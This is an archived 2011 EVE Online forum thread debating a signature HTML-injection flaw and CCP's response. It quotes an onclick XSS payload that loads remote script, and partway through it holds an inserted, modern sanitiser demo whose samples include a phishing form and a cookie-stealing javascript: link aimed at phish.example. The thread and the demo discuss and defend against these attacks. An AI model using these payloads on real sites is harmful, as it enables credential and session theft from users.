New Dev Blog: New Forum Security Blog - Cookie Derp
 
This thread is older than 90 days and has been locked due to inactivity.


 
Pages: 1 2 3 4 [5] 6 7 8 9


Smagd
Encina Technologies
Namtz' aar K'in
Posted - 2011.04.12 08:57:00 - [121]
 

Edited by: Smagd on 12/04/2011 08:59:35
Maybe I shouldn't say this, but my confidence is a bit shaken (not stirred).

I can quote at least two historic instances where people have been trying to point CCP to an issue, and no petition would help until someone went to the forums and made it public:

T20's Dev Hax would probably serve as a good example of how not to report issues, but Dark Shikari's Trade Window Scam is certainly an example of a correct way to do it - and it STILL took a forum threadnaught.

At this point I'm not really sure that any "procedures put in place" to make it easier to get CCP to listen actually work.

In the light of the current forum "cookie derp" I may have become a little hard to convince that emails sent to that fancy security email address are treated with any better priority sorting than critical petitions.

Better than "Hey that subject line looks important".

Rixiu
The Inuits
Posted - 2011.04.12 08:58:00 - [122]
 

I'll just leave this here

CCP, I am disappoint.

Mynas Atoch
Eternity INC.
Goonswarm Federation
Posted - 2011.04.12 09:05:00 - [123]
 

Edited by: Mynas Atoch on 12/04/2011 09:08:00

I hadn't seen it all in one place before, but it's really quite surprising that

a. CCP claim to have invested 72,000 man-hours...

b. to implement an off-the-shelf, open-source, GPLv2'd forum software (YAF.net) by adding an EVE skin and their own account security, ...

c. but failed in its performance of the basic QA expected for any modern web application.

Here's a PDF: "The Open Web Application Security Project - The Ten Most Critical Web Application Security Risks 2010". You can print it out and read it at your leisure.


Trebor Daehdoow
Gallente
Sane Industries Inc.
Posted - 2011.04.12 09:35:00 - [124]
 

Originally by: Yuki Kulotsuki
So mittens is king of the piggies?

Well, he is a bit of a ham.

Originally by: Gavjack Bunk
Sreeg's Barrel. It's CCP's answer to Schrodinger's Cat. Do we know what state he's in right now?

Inebriation. He either collapses into it, or collapses because of it.

But seriously now, while I thank Sreegs for his report, and his engagement with the community on this and other issues, the real challenge for CCP will be in what comes after the dust has settled -- "what happened" is important, but "why it happened" and "what steps must be taken to prevent it from happening again" are even more important, and it is the answers to those questions which will be the true basis for judgment.

Gavjack Bunk
Gallente
Genos Occidere
HYDRA RELOADED
Posted - 2011.04.12 09:39:00 - [125]
 

Originally by: Trebor Daehdoow
But seriously now, while I thank Sreegs for his report, and his engagement with the community on this and other issues


A meltdown is definitely the best way to remind people that you're human.

Hel O'Ween
Men On A Mission
EVE Trade Consortium
Posted - 2011.04.12 09:53:00 - [126]
 

What this whole damage-control dev blog - and the discussion around it - happily ignores is the fact that after the forums were taken down the first time and went online again with an assuring "we fixed it, everything's fine now" statement accompanying it, the problems were still there!

Only after another demonstration were they put offline. How assuring is this for us?

Oh, and thank you very much for making clear that your paying customers are to blame for this, as they didn't write the petitions/bug reports in such a way that you don't have to do the research yourself. I'd suggest you scrap every report that has no compilable code attached to it. Anything else can't be taken seriously.

Hel O'Ween
Men On A Mission
EVE Trade Consortium
Posted - 2011.04.12 09:55:00 - [127]
 

Originally by: Misanth

Communication is not CCP's strongest side, never has been. They misunderstand players, we misunderstand them. They present stuff in a way that aggravates the playerbase, even though it could easily be made in a more appealing fashion. Etc.



Yeah, Hilmar's words at the FanFest keynote this year come to mind: "We miscommunicated, we didn't communicate at all. We've learned from that."

Grimpak
Gallente
Midnight Elites
Echelon Rising
Posted - 2011.04.12 10:01:00 - [128]
 

Edited by: Grimpak on 12/04/2011 10:01:01
Originally by: Hel O'Ween
What this whole damage-control dev blog - and the discussion around it - happily ignores is the fact that after the forums were taken down the first time and went online again with an assuring "we fixed it, everything's fine now" statement accompanying it, the problems were still there!

Only after another demonstration were they put offline. How assuring is this for us?

Oh, and thank you very much for making clear that your paying customers are to blame for this, as they didn't write the petitions/bug reports in such a way that you don't have to do the research yourself. I'd suggest you scrap every report that has no compilable code attached to it. Anything else can't be taken seriously.
Well, to be fair, Sreegs is the security guy, not the code guy.
That, and the fact that it was a weekend, also didn't help at all.

Originally by: Trebor Daehdoow
But seriously now, while I thank Sreegs for his report, and his engagement with the community on this and other issues, the real challenge for CCP will be in what comes after the dust has settled -- "what happened" is important, but "why it happened" and "what steps must be taken to prevent it from happening again" are even more important, and it is the answers to those questions which will be the true basis for judgment.


tbh from this side's POV this was yet another issue in a long string of issues that have plagued EVE lately where it seems that either QA didn't look at it or there is no QA at all.

Super Whopper
I can Has Cheeseburger
Posted - 2011.04.12 10:09:00 - [129]
 

Edited by: Super Whopper on 12/04/2011 10:09:53
Originally by: Trebor Daehdoow
"what happened"


That thing called excellence, which CCP kept going on about, was exposed in all its glory. Now you may wonder why not a single blog has used that word in months.

Originally by: Hel O'Ween
Yeah, Hilmar's words at the FanFest keynote this year come to mind: "We miscommunicated, we didn't communicate at all. We've learned from that."


The only thing CCP have learned is how to use the CSM to string us along.

Originally by: Grimpak
tbh from this side's POV this was yet another issue in a long string of issues that have plagued EVE lately where it seems that either QA didn't look at it or there is no QA at all.


Lately, since 2003.

Kristina Vanszar
Caldari
Posted - 2011.04.12 10:19:00 - [130]
 

The DEV BLOG,

not at risk? Sorry guys, this must be a joke; as you've said, it was possible to include HTML.
Who would prevent me from adding a div which looks exactly like your login one, placing it at exactly the same position as the original one, containing an iframe with the login form itself, and gathering some login information???

Sorry, but I do not think that account information has not been at risk...

Just as a side tip, PLEASE check that it is not possible to execute server-side commands, like SHELLs and stuff....

Grimpak
Gallente
Midnight Elites
Echelon Rising
Posted - 2011.04.12 10:20:00 - [131]
 

Originally by: Super Whopper
Lately, since 2003.


I was actually talking about the rumoured contractual SNAFU that happened when Iceland went **** up, which kicked out half of the QA department, but you can go that way too, saying this game is a failure from day 0.
Why are you playing, though?

Kepakh
Posted - 2011.04.12 11:04:00 - [132]
 

Originally by: Kristina Vanszar

Who would prevent me from adding a div which looks exactly like your login one, placing it at exactly the same position as the original one, containing an iframe with the login form itself, and gathering some login information???



I am not particularly sure how you would be gathering any information just by adding a div and no script working...

Kristina Vanszar
Caldari
Posted - 2011.04.12 11:06:00 - [133]
 

Originally by: Kepakh
Originally by: Kristina Vanszar

Who would prevent me from adding a div which looks exactly like your login one, placing it at exactly the same position as the original one, containing an iframe with the login form itself, and gathering some login information???



I am not particularly sure how you would be gathering any information just by adding a div and no script working...


A div with an iframe, which contains a fully functional login form, hosted from another website,
which is asking you to log in to the forums.
There are plenty of users not thinking twice who would just enter the credentials.

RaTTuS
BIG
Gentlemen's Agreement
Posted - 2011.04.12 11:08:00 - [134]
 

It was still limited to 500 characters.

Kepakh
Posted - 2011.04.12 11:09:00 - [135]
 

Originally by: Kristina Vanszar

A div with an iframe, which contains a fully functional login form, hosted from another website,
which is asking you to log in to the forums.
There are plenty of users not thinking twice who would just enter the credentials.


No script, no data sent anywhere...?

Kristina Vanszar
Caldari
Posted - 2011.04.12 11:17:00 - [136]
 

Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the forum; it would be hosted by another website, and therefore executed. But it would look like it is on the forums.

Jimmae
Posted - 2011.04.12 11:19:00 - [137]
 

Edited by: Jimmae on 12/04/2011 11:23:55
Originally by: Kepakh
Originally by: Kristina Vanszar

A div with an iframe, which contains a fully functional login form, hosted from another website,
which is asking you to log in to the forums.
There are plenty of users not thinking twice who would just enter the credentials.


No script, no data sent anywhere...?

We have a proverb where I come from: "If you don't have a clue just shut the f*ck up."

You don't need JavaScript to trigger an HTTP POST request. All you need is a <form> tag.

Besides that, not being able to inject a <script> tag doesn't mean I cannot inject script through other ways. onclick, for example, can be an easy way, and so can an href.

Kristina Vanszar
Caldari
Posted - 2011.04.12 11:25:00 - [138]
 

Originally by: Jimmae
Edited by: Jimmae on 12/04/2011 11:23:55
Originally by: Kepakh
Originally by: Kristina Vanszar

A div with an iframe, which contains a fully functional login form, hosted from another website,
which is asking you to log in to the forums.
There are plenty of users not thinking twice who would just enter the credentials.


No script, no data sent anywhere...?

We have a proverb where I come from: "If you don't have a clue just shut the f*ck up."

You don't need JavaScript to trigger an HTTP POST request. All you need is a <form> tag.

Besides that, not being able to inject a <script> tag doesn't mean I cannot inject script through other ways. onclick, for example, can be an easy way, and so can an href.

This ^^
Thank you :-)

Miso Hawnee
Posted - 2011.04.12 11:26:00 - [139]
 

If I performed like this at work, I would be fired and possibly in jail.

Maybe there is no IT equivalent to the NEC, maybe there are no standards or structure to it at all. I doubt this though, you don't go to college and learn Information Technology because its an inane science.

Oh hi ya we forgot to ground your 480v system, but we assure that it is working now. Never mind your line worker that is break dancing every time he touches a control desk. In fact, I recommend you fire that worker for bringing our incompetence to light.

Kepakh
Posted - 2011.04.12 11:45:00 - [140]
 

Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the forum; it would be hosted by another website, and therefore executed. But it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP's web server, and CCP Sreegs clearly said that no script will pass, nor is there any evidence anyone has achieved that.

Jimmae
Posted - 2011.04.12 11:52:00 - [141]
 

Edited by: Jimmae on 12/04/2011 11:56:09
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the forum; it would be hosted by another website, and therefore executed. But it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP's web server, and CCP Sreegs clearly said that no script will pass, nor is there any evidence anyone has achieved that.


Did you even read what he wrote?

1. I present you with an injected login form.
2. You fill out said form.
3. It sends your credentials to me.
4. ???
5. PROFIT

PS: Remember the proverb!

PPS: A very simple example of how to include a .js file from an external source using an onclick handler:
<div onclick="(s=(d=document).createElement('script')).src='http://www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">click me</div>


Edit: Why do I always type onlick? Gotta be something Freudian.
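An added example, not code from this thread, from CCP or from YAF.net, to make Jimmae's point above concrete: a filter that only looks for <script> tags passes every payload argued about in this post (an onclick handler, a plain <form> that POSTs to a third party, an iframe, a javascript: href), while an allowlist sanitiser that rebuilds tags from a fixed set of tag names and attribute names drops all of them and leaves a legitimate signature untouched. The tag and attribute lists, the phish.example hostname and the sample signatures are constructed for this demonstration; the onclick sample is Jimmae's snippet with a scheme added to the URL.

```javascript
// Added example, not code from this thread or from CCP's / YAF.net's forum
// software. Allowlist-based sanitiser for a "limited subset of HTML" such
// as a forum signature, run over the injection strings argued about above.
// Tag/attribute allowlists, the phish.example hostname and the sample
// signatures are constructed for the demonstration.

const ALLOWED_TAGS = new Set(["b", "i", "u", "br", "p", "a", "img", "div", "span"]);
const ALLOWED_ATTRS = { a: new Set(["href"]), img: new Set(["src", "alt"]) };
// URL-valued attributes must carry an explicit, known-safe scheme; this
// rejects "javascript:" in every spelling, since none starts with http(s): or mailto:.
const SAFE_SCHEMES = /^(https?:|mailto:)/i;

// Tokeniser for the demo. A production filter should use a real HTML parser:
// browsers accept many malformed constructs that a regex will not recognise.
const TAG_RE = /<\/?([a-zA-Z][a-zA-Z0-9]*)((?:\s+[^\s=>\/]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)\s*\/?>/g;
const ATTR_RE = /([^\s=\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

// Text outside tags: neutralise any angle brackets left over from dropped or
// malformed markup (existing entities such as &amp; are left alone here).
function escapeText(text) {
  return text.replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// The filter some posters in the thread imagine: strip <script> blocks only.
function naiveScriptStrip(html) {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, "");
}

// Allowlist sanitiser: unknown tags are dropped (iframe, form, input, script),
// unknown attributes are dropped (every on* handler, style), and URL-valued
// attributes must use a safe scheme. Kept tags are re-serialised from scratch
// rather than copied, so nothing unexpected survives from the input.
function sanitizeSignature(html) {
  let out = "";
  let last = 0;
  for (const m of html.matchAll(TAG_RE)) {
    out += escapeText(html.slice(last, m.index));
    last = m.index + m[0].length;
    const tag = m[1].toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) continue;
    if (m[0].startsWith("</")) { out += `</${tag}>`; continue; }
    const allowedAttrs = ALLOWED_ATTRS[tag] || new Set();
    const attrs = [];
    for (const a of m[2].matchAll(ATTR_RE)) {
      const name = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? "";
      if (!allowedAttrs.has(name)) continue;
      if ((name === "href" || name === "src") && !SAFE_SCHEMES.test(value.trim())) continue;
      attrs.push(` ${name}="${value.replace(/"/g, "&quot;")}"`);
    }
    out += `<${tag}${attrs.join("")}>`;
  }
  out += escapeText(html.slice(last));
  return out;
}

// Constructed sample signatures; each is well under the 500-character limit
// mentioned in the thread.
const SAMPLES = {
  // Jimmae's onclick handler: no <script> tag in the input, yet it loads one.
  onclick: `<div onclick="(s=(d=document).createElement('script')).src='http://www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">Click for free ISK</div>`,
  // A plain <form> POSTs credentials off-site with no JavaScript at all.
  form: `<form action="https://phish.example/collect" method="post">Username: <input name="u"> Password: <input name="p" type="password"><input type="submit" value="Log in"></form>`,
  // A frame shows a page the forum server never sees and cannot filter.
  iframe: `<iframe src="https://phish.example/login"></iframe>`,
  // Script via an allowed tag and an allowed attribute: a javascript: URL.
  href: `<a href="javascript:location='https://phish.example/?c='+document.cookie">forum rules</a>`,
  // Legitimate signature content that should pass through unchanged.
  benign: `<b>Fly safe</b> o7 <a href="https://www.eveonline.com">EVE</a>`,
};

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(`${name}:`);
  console.log(`  script-strip only: ${naiveScriptStrip(html)}`);
  console.log(`  allowlist:         ${sanitizeSignature(html)}`);
}
```

The point of the design is that nothing from the input is copied through: a kept tag is rebuilt from its lower-cased name and only the attributes on its allowlist, so an event handler, a style attribute, an unexpected tag or a javascript: URL cannot survive whatever encoding trick was used to sneak it past a denylist. Note that the 500-character limit RaTTuS mentions is no defence on its own; the form sample above is under 200 characters.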

Kristina Vanszar
Caldari
Posted - 2011.04.12 11:53:00 - [142]
 

Edited by: Kristina Vanszar on 12/04/2011 11:56:15
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the forum; it would be hosted by another website, and therefore executed. But it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP's web server, and CCP Sreegs clearly said that no script will pass, nor is there any evidence anyone has achieved that.



WRONG!
An iframe is nothing more than you opening another website, in this particular case without knowing it.

@Jimmae, not 1000% sure, but it should work too, 'cause you're jumping over the check and are creating the script "at runtime".

CCP Sreegs

Posted - 2011.04.12 11:55:00 - [143]
 

Originally by: Kristina Vanszar
The DEV BLOG,

not at risk? Sorry guys, this must be a joke; as you've said, it was possible to include HTML.
Who would prevent me from adding a div which looks exactly like your login one, placing it at exactly the same position as the original one, containing an iframe with the login form itself, and gathering some login information???

Sorry, but I do not think that account information has not been at risk...

Just as a side tip, PLEASE check that it is not possible to execute server-side commands, like SHELLs and stuff....


Iframes were not possible. Only a limited subset of HTML was. The investigation is still ongoing but we have no reason to believe that spawning a shell or server compromise was possible either.

CCP Sreegs

Posted - 2011.04.12 11:57:00 - [144]
 

Originally by: Jimmae
Edited by: Jimmae on 12/04/2011 11:56:09
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the forum; it would be hosted by another website, and therefore executed. But it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP's web server, and CCP Sreegs clearly said that no script will pass, nor is there any evidence anyone has achieved that.


Did you even read what he wrote?

1. I present you with an injected login form.
2. You fill out said form.
3. It sends your credentials to me.
4. ???
5. PROFIT

PS: Remember the proverb!

PPS: A very simple example of how to include a .js file from an external source using an onclick handler:
<div onclick="(s=(d=document).createElement('script')).src='http://www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">click me</div>


Edit: Why do I always type onlick? Gotta be something Freudian.


This code was not possible either.

Kepakh
Posted - 2011.04.12 11:59:00 - [145]
 

Originally by: Jimmae

1. I present you with an injected login form.



It is still the web server that determines if your injection will be passed or not and how the result will be displayed.


There is no evidence that handler as such would be working. You only state your speculations as facts.


Jimmae
Posted - 2011.04.12 12:01:00 - [146]
 

Originally by: CCP Sreegs
Originally by: Jimmae
Edited by: Jimmae on 12/04/2011 11:56:09
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the forum; it would be hosted by another website, and therefore executed. But it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP's web server, and CCP Sreegs clearly said that no script will pass, nor is there any evidence anyone has achieved that.


Did you even read what he wrote?

1. I present you with an injected login form.
2. You fill out said form.
3. It sends your credentials to me.
4. ???
5. PROFIT

PS: Remember the proverb!

PPS: A very simple example of how to include a .js file from an external source using an onclick handler:
<div onclick="(s=(d=document).createElement('script')).src='http://www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">click me</div>


Edit: Why do I always type onlick? Gotta be something Freudian.


This code was not possible either.

I am glad to hear that! It is one of the most basic examples and doesn't even try masking itself.

Kristina Vanszar
Caldari
Posted - 2011.04.12 12:01:00 - [147]
 

OK Sreegs, thanks for the info,
I changed all passwords I had, just in case.

Can I ask you something:
Please guys, if you find out that something has gone terribly wrong, and **** could hit the fan very badly,

let us know, so we can prepare ourselves if that's the case; saying everything is fine and hoping no one will find out is just a bad idea.

If you are 1000000% sure nothing could've happened, let us know too, but with a detailed description why....

Br,
o7

BTW: I've filled out the BH form and haven't got any response till now.

CCP Sreegs

Posted - 2011.04.12 12:03:00 - [148]
 

Originally by: mazzilliu
apparently the guy who first reported the issue and later got banned said that his initial exploit report was incomplete, but there was no ccp effort to get him to elaborate.

perhaps it would be an improvement to have some sort of followup for security related reports, in case the reporter does not understand how to properly demonstrate an exploit, to try to get him to communicate clearly, rather than brush them off as another incomplete bug report or potential troll. i think if that happened the forums might have gone down some time sooner.


I cannot comment on individual administrative actions as a matter of policy. This unfortunately also leaves me in a position where I cannot counter your speculation, except to point to the steps outlined in the blog and let you know that we really don't want to ban people from EVE.

kakmonstret
Posted - 2011.04.12 12:03:00 - [149]
 

Edited by: kakmonstret on 12/04/2011 12:05:20
Originally by: Jimmae
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the forum; it would be hosted by another website, and therefore executed. But it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP's web server, and CCP Sreegs clearly said that no script will pass, nor is there any evidence anyone has achieved that.


Did you even read what he wrote?

1. I present you with an injected login form.
2. You fill out said form.
3. It sends your credentials to me.
4. ???
5. PROFIT

PS: Remember the proverb!

PPS: A very simple example of how to include a .js file from an external source using an onclick handler:
<div onclick="(s=(d=document).createElement('script')).src='http://www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">click me</div>


Okay, people, have you ever done stuff like this? Regarding the above example, a filter to filter out JS will hopefully catch that. Now, this being the CCP webdev clowns, we can't be too sure.

Regarding frames, they can load any other content on the web. If CCP doesn't have some very interesting check on their server that loads the iframe target and checks for JS there, it would not be able to do anything. In any case, there is no way CCP can filter content on a remote site loaded in a frame, because that content is *not* loaded by their server; instead it is only loaded by your browser. If the server does a check for frames and checks their target, the only thing it can do is to remove the frame completely. That such a check exists I would say is very unlikely.

Edit:
And all the nice theory was blown away by "no frames allowed". Well well, nice try.

Kristina Vanszar
Caldari
Posted - 2011.04.12 12:08:00 - [150]
 

Originally by: kakmonstret
Originally by: Jimmae
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the forum; it would be hosted by another website, and therefore executed. But it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP's web server, and CCP Sreegs clearly said that no script will pass, nor is there any evidence anyone has achieved that.


Did you even read what he wrote?

1. I present you with an injected login form.
2. You fill out said form.
3. It sends your credentials to me.
4. ???
5. PROFIT

PS: Remember the proverb!

PPS: A very simple example of how to include a .js file from an external source using an onclick handler:
<div onclick="(s=(d=document).createElement('script')).src='http://www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">click me</div>


Okay, people, have you ever done stuff like this? Regarding the above example, a filter to filter out JS will hopefully catch that. Now, this being the CCP webdev clowns, we can't be too sure.

Regarding frames, they can load any other content on the web. If CCP doesn't have some very interesting check on their server that loads the iframe target and checks for JS there, it would not be able to do anything. In any case, there is no way CCP can filter content on a remote site loaded in a frame, because that content is *not* loaded by their server; instead it is only loaded by your browser. If the server does a check for frames and checks their target, the only thing it can do is to remove the frame completely. That such a check exists I would say is very unlikely.


If the frame element family was filtered by the signature checks then it couldn't do any harm. I didn't want my accounts banned, or even trouble with my RL company going to hell because of an attack with CCP as target without a contract to do so, so I didn't test it.

I hope frames were not possible.





 


The new forums are live

Please adjust your bookmarks to https://forums.eveonline.com

These forums are archived and read-only